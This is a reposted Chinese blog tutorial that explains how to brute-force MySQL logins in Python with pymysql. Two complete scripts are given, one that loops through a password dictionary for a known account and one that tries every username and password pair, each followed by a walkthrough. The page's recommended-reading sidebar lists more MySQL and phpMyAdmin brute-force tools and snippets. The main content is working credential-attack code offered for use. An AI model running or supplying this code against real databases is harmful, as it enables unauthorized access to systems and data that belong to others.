几行Python代码破解mysql数据库

最新推荐文章于 2024-08-10 17:36:41 发布
转载 最新推荐文章于 2024-08-10 17:36:41 发布 · 307 阅读 · 1 ·
CC 4.0 BY-SA版权
原文链接:https://mp.weixin.qq.com/s?__biz=MzU5NjM4MDY1Mw==&mid=2247507485&idx=1&sn=9933e0a2326a42ea6fefb0eb5b735be6&chksm=fe61009fc9168989549b8c6d17c4f08afe1e4b0ebefdd31b1a68add42eadaa1835f7ed4396ea&scene=126&&sessionid=0
文章标签:

#数据库 #python #mysql #java #linux

今天来给大家简单讲解一下怎么实现python暴力破解mysql数据。

知道账号的情况下破解密码

大家知道mysql需要账号和密码才能登陆,我们今天做一个在知道账号的情况下对密码进行破解。(后面继续跟进账号密码都不知道的情况)

既然是暴力破解,避免离开不了密码字典,对于密码字典,我们采用从文本文档进行读取。

利用密码字典我们可以不停的刷密码,从而破解成功进行登录。

下面先贴上代码:

# coding:utf-8
import pymysql#导入连接数据库的模块
class PoJie:
    def __init__(self,path):
        self.file =open(path,"r",errors="ignore")#打开密码字典文件
        
    def LianJieMySql(self,word):#连接数据库的方法
        try:
            db =pymysql.connect("localhost","root",word) #连接数据库
            #pymysql.connect()方法的第一个参数是ip地址,本机可以用localhost代替
            #第二个参数是账户名,本文章为知道用户名情况破解密码
            #第三个是密码,
            db.close()#关闭数据库
            return True#连接成功返回True
        except:
            return False
            
    def PoJieChangShi(self):#读取密码字典的方法
        while True:#循环读取
            mystr=self.file.readline()#读取密码字典的一行
            if not mystr:#如果读到文件最后没有数据了,就跳出循环
                break
            if self.LianJieMySql(mystr):#把读到的一行密码传到连接数据库方法里面
                #如果返回了True说明破解成功
                print("密码正确----",mystr)#打印正确密码
                break#结束循环
            else :
                print("密码错误",mystr)
                              
    def __del__(self):#无论如何最终要执行的方法
        self.file.close()#关闭密码字典文件
        pass
    
path=r"C:\Users\Administrator\Desktop\wordlist.txt"#传入密码字典绝对文件路径
start =PoJie(path)#实例化对象
start.PoJieChangShi()#对象执行方法

下面为运行结果:

52c6aaebe7d7818328f0609af8daa67c.jpeg

是不是很简单啊!

我简单说一下实现过程:

  1. 首先,一定要导入连接数据库的模块也就是(import pymysql)

  2. 写了一个连接数据库的方法,写了一个从文本文档逐行读取密码的方法。

  3. 对于读取的每一行密码,我们都把它传入连接数据库的方法中,进行连接测试。

  4. 如果连接成功则返回True。

  5. 这里使用了try语句,因为当连接失败,也就是密码不正确的时候,系统会报错,所以我们使用try捕获异常,抛出错误,避免系统出现异常错误终止我们的程序。

密码字典哪里来,大家可以自己使用python生成器进行生成。

不知道账号的情况下破解密码

下面贴上代码:

# coding:utf-8
import pymysql#导入连接数据库的模块
class PoJieTwo:
    def __init__(self,accountPath,wordPath):
        self.accountFile =open(accountPath,"r",errors="ignore")#打开账户字典
        self.wordFile =open(wordPath,"r",errors="ignore")#打开密码字典   
        
    def LianJieMySql(self,account,word):#连接数据库的方法
        try:
            db =pymysql.connect("localhost",account,word) #连接数据库
            #pymysql.connect()方法的第一个参数是ip地址,本机可以用localhost代替
            #第二个参数是账户名,
            #第三个是密码,
            db.close()#关闭数据库
            return True#连接成功返回True
        except:
            return False
            
    def PoJieChangShi(self):#读取字典文件的方法
        while True:#循环读取账户字典
            myAccount=self.accountFile.readline()#读取一行
            if not myAccount:#如果读到账户文件最后没有数据了,就跳出循环
                break
            
            while True:#循环读取密码字典
                myWord=self.wordFile.readline()#读取密码字典的一行
                if not myWord:#如果读到密码文件最后没有数据了,就跳出循环
                    break
                if self.LianJieMySql(myAccount,myWord):#把读到账户和密码传到连接数据库方法里面
                    #如果返回了True说明破解成功
                    print("账户:",myAccount,"密码正确----",myWord)#打印正确密码
                    break#结束循环
                else :
                    print("账户:",myAccount,"密码错误",myWord)
                              
    def __del__(self):#无论如何最终要执行的方法
        self.accountFile.close()#关闭账户字典
        self.wordFile.close()#关闭密码字典文件
        pass


accountPath=r"C:\Users\Administrator\Desktop\账号.txt"#传入账户字典绝对文件路径   
wordPath=r"C:\Users\Administrator\Desktop\wordlist.txt"#传入密码字典绝对文件路径
start =PoJieTwo(accountPath,wordPath)#实例化对象
start.PoJieChangShi()#对象执行方法

下面是运行结果:

41a9dc89703d90ac8199f3aff26c31ce.jpeg

代码只是稍作修改。下面讲一下思路:

  1. 在之前单纯破解密码的基础上,我们加上了账户破解,

  2. 所以我们需要两个字典文件,一个是账号字典,一个是密码字典,

  3. 我们在读取字典文件的的方法中,首先读一行账号,然后把密码刷一遍,在每次读账号后,都需要刷一遍密码;

来源:https://blog.youkuaiyun.com/m0_38124502/article/details/77982883

推荐阅读

lyc2016012170
关注
Python接口自动化测试框架(实战篇)-- 数据库操作MySQL
我先测了
07-29 921
说起数据库的操作,咱们应该保持一颗敬畏的心,在很多时候,错误不一定是程序引起的,有可能是非法操作了数据库导致的,不到必要一般不建议直接去操作数据库,因为一旦操作错了,结果是不可逆的。那么先说说什么理由,非得要操作数据库?前面不是说了关于手机号的唯一性?接口测试数据库断言?还有批量构造数据?NoNoNo,这不能算作理由,但可以进行风险评估,如果动作较大,建议出具必要的方案:如何动,怎么动,坏了怎么办?预案?如何恢复?等等这些步骤一个也不少的准备清楚,避免给公司正常运营造成经济损失。
几行代码搞定python破解mysql数据库【二】
我不喜欢这个世界
09-14 4711
上篇介绍了在知道账号的情况下破解密码,这篇介绍不知道账号的情况: 既然大家已经看了上篇文章,我就不啰嗦了;下面贴上代码:# coding:utf-8 import pymysql#导入连接数据库的模块 class PoJieTwo: def __init__(self,accountPath,wordPath): self.accountFile =open(account
PythonMysql爆破小脚本
01-19
Mysql Python版本爆破小脚本,需要安装Python插件MySQL-python.exe,可以看出代码量很少,(注意:里用户名和密码都是类似字典。用法:保存代码MysqlDatabaseBlasting.py,cmd切换到 MysqlDatabaseBlasting.py路径下,并 执行 MysqlDatabaseBlasting.py即可开始破解 ) import MySQLdb #coding=gbk #目标IP mysql数据库必须开启3360远程登陆端口 mysql_username = ('root','test', 'admin', 'user')#账号字典 commo
Python+MySQL用户加密存储验证系统
08-04
请先安装MySQL,并进行测试连接,exe文件可用于win8/10 x64 注意exe除非环境和我一样,否则 不能运行的,我的设置是host = '127.0.0.1',user='root',passwd='A089363b' 注意还是自己从源码修改然后用pyinstaller进行修改吧 用户加密存储系统--用于托管第三方数据库,内容进行加密后存储,没有秘钥无法破解 1.用户存储,登录,查看,删除操作,存储在数据库中 2.用户密码加密存储,密码加密方式可选,目前只可选MD5和SHA1,用户存储内容加密存储,加密方式自定义 3.自定义(我自己定义了一个加密解密函数)加密序列,拿到内容没有序列无法解密 4.可更改用户密码,更改自定义KEY,更改加密存储内容 have fun! 如果有BUG请与我联系,也可以在我主页留言博客http://blog.youkuaiyun.com/MrLevo520 谢谢
python mysql数据库爆破_python 构造mysql爆破器
weixin_39945871的博客
12-06 210
importpymysqlimportoptparseimportosimportconfigparserdefmain():parser=optparse.OptionParser()parser.add_option('-u',dest='username',help='MySQL username of blasting')parser.add_option('-p',dest='passw...
python破解mysql数据库【二】
宁不凡的博客
07-12 421
下面贴上代码:# coding:utf-8 import pymysql#导入连接数据库的模块 class PoJieTwo: def __init__(self,accountPath,wordPath): self.accountFile =open(accountPath,"r",errors="ignore")#打开账户字典 self.wordFil...
几行Python代码爬取3000+上市公司的信息
09-19
9. **数据库存储**:在进一步完善代码时,将数据存储到MySQL数据库中。这需要使用`pymysql`库连接MySQL数据库,`create_engine`和SQLAlchemy库则用于操作数据库。 10. **时间计算**:使用`time`模块记录程序运行...
Python如何读取MySQL数据库表数据
09-09
Python编程中,读取MySQL数据库表数据是常见的任务,特别是在数据分析、Web开发等领域。Python提供了多种库来实现这一功能,其中最常用的是`pymysql`和`pandas`。下面将详细介绍如何使用这两个库来读取MySQL数据库...
Python使用pymysqlMySQL数据库中读出数据的方法
09-09
Python中,与MySQL数据库进行交互是常见的任务,特别是在数据处理和分析场景中。在Python 3.x版本中,`mysqldb`库不再被支持,取而代之的是`pymysql`。`pymysql`是一个兼容MySQL协议的纯Python实现,可以方便地...
python自动化笔记:操作mysql数据库
zhoukeguai的博客
08-10 714
终端输入:pip install mysql-connector -i https://pypi.tuna.tsinghua.edu.cn/simple/终端输入:pip install pymysql -i https://pypi.tuna.tsinghua.edu.cn/simple/实现的逻辑跟pysql一致,相同的操作,操作方法也一致。fetchmany(size)获取前几行记录。fetchall() 获取所有的记录。fetchone()获取第一行记录。
phpMyAdmin(MySQL)暴力破解工具v1.3.rar
06-18
目前phpMyAdmin3.2.5,phpMyAdmin3.2.1、phpMyAdmin2.11.2版本测试均成功! 此工具仅供网友技术学习交流使用,请勿使用于非法用途。
使用python实现MySQL作为数据存储的登陆,注册和修改密码
12-14
自己在学习pyton时写的一个小程序,实现从MySQL中抽取数据,实现注册和登陆,修改密码等。
利用python爆破mysql数据库
qq_52344654的博客
12-08 3289
使用python爆破mysql的操作
Python mysql 爆破
weixin_34161029的博客
05-13 391
缺点:不支持网段单线程#-*-coding:utf_8-*- #Date:2015/5/13 #author:sanr importMySQLdb importos importsys defREADME(): print'+'+'-'*50+'+' print'\tPythonMySQL爆破' ...
Python写了个工具,完美破解MySQL!!(建议收藏)
热门推荐
冰河的专栏
07-01 4万+
再也不怕忘记MySQL的用户名和密码了,用这个工具可以秒破MySQL,冰河强烈建议收藏!!
一个简单的python3批量爆破mysql
https://www.cnblogs.com/zpchcbd/
04-13 2101
# coding:utf-8 import pymysql import threading import time import IPy import subprocess def mysql_connect1(ip,shell_url,shell_content): #判断是否存活 if not(ping_ip(ip)): return #尝试数据库...
python破解mysql数据库【一】
宁不凡的博客
07-12 1078
python暴力破解mysql数据。当然还是先讲一下整体思路:1)大家知道mysql需要账号和密码才能登陆,我们今天做一个在知道账号的情况下对密码进行破解。(后面继续跟进账号密码都不知道的情况)2)既然是暴力破解,避免离开不了密码字典,对于密码字典,我们采用从文本文档进行读取。 如果还不知道怎样从(.txt)格式文件中读取数据,请看我的这篇文章 简单python逐行读取文件中的内容3)利用密码字典...
Python3暴力破解Mysql(端口3306)
lieren123567的博客
11-10 739
固定端口3306,可自由设置线程数 """ 暴力破解Mysql """ import pymysql import multiprocessing import time def pymysql_connect(ip, mysql_user, mysql_password): try: # 连接数据库 db = pymysql.connect(host = ip, user = mysql_user, passwd=mysql_password, port=
python连接mysql数据库报错
最新发布
01-06
### Python 连接 MySQL 数据库常见错误及其解决方案 #### 错误 1: `ImportError: No module named 'pymysql'` 当尝试导入 pymysql 模块而未安装时会触发此异常。为了修复这个问题,可以使用 pip 安装 pymysql: ```bash pip install pymysql ``` 如果是在虚拟环境中工作,则需激活环境后再运行上述命令。 #### 错误 2: `'cryptography' package is required for sha256_password or caching_sha2_password auth methods` [^2] 对于采用 SHA-256 或缓存 SHA-2 密码验证方式的情况,必须先安装 cryptography 包来满足依赖关系: ```bash pip install cryptography ``` 接着确认已正确设置了数据库用户的认证插件;如果不是必要的话,考虑切换回更传统的密码校验机制如 mysql_native_password。 #### 错误 3: Emoji 表情无法存储到 MySQL 中 [^3] 要使应用程序能够处理并持久化包含 emoji 字符的数据至 MySQL,应当调整服务器端编码设置为 UTF8MB4 并相应更新表结构定义中的字段类型属性。具体操作如下所示,在建立新连接之前发送一条更改字符集的指令给服务端: ```sql SET NAMES utf8mb4; ``` 另外还需编辑 my.cnf 文件内的 `[mysqld]` 部分加入下面几行配置项以确保整个实例都遵循相同的字符编码标准: ```ini character-set-server=utf8mb4 collation-server=utf8mb4_unicode_ci ``` 重启 MySQL 后生效变更。 #### 错误 4: 加密连接失败 [^4] 某些情况下可能因为 SSL/TLS 设置不当而导致握手过程出现问题。此时应检查客户端与服务器之间的安全协议版本兼容性以及证书链的有效性。此外还可以通过指定参数 disable_ssl=True 来禁用加密传输作为临时措施(仅限于测试环境下),但这不是推荐的做法。 综上所述,针对不同类型的连接问题采取相应的对策即可有效解决问题。值得注意的是保持驱动程序和相关软件包处于最新状态有助于减少潜在冲突的发生几率。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值